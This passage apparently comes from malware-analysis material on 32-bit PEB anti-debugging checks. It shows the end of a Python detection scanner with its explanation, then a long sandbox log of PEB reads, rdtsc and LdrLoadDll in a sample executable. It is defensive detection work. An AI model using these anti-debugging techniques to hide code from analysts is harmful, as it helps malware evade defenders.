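    "648B0D30000000"    # mov ecx, fs:[30h]          (offset 17)
    "8B4168"            # mov eax, [ecx+68h]         NtGlobalFlag
    "83E070"            # and eax, 70h
    "5DC3"              # pop ebp; ret
)

if __name__ == "__main__":
    for hit in find_peb_antidebug(SAMPLE):
        print(f"+0x{hit['offset']:04x} {hit['load']:20s} -> {hit['checks'] or ['no field read in window']}")
```

A PEB load with no field read in the window is usually benign (the loader and the CRT read the PEB constantly for the module list, heap and environment), so the scanner reports it with an empty check list instead of dropping it; only hits with a BeingDebugged or NtGlobalFlag read should feed a verdict. Note that the NtGlobalFlag offset differs on 64-bit (the PEB layout is not the same), so this table must not be applied to x64 code.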
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00409A80 rdtsc
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0040ACC0 LdrLoadDll,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019E41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01959100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01959100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01959100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01974120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01974120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01974120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01974120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01974120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01959080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019990AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019558EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A24015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A24015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01970050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01970050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A12073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A21074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A25BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01961B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01961B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A0D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01984BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01984BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01984BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A1131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0195F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0195DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01983B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01983B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0195DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A28B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0198D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0198D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0196AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0196AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0198FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01982ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01982AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0195AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0195AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01955210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01955210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01955210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01955210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01973A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01968A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01994A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01994A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A0B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A0B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A28A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019E4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01959240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01959240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01959240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01959240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0199927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A1EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0198FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0198FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01982581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01982581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01982581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01982581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01952D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01952D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01952D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01952D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01952D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01981DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01981DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01981DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019835A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A08DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019D6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0196D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0196D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A28D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A1E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
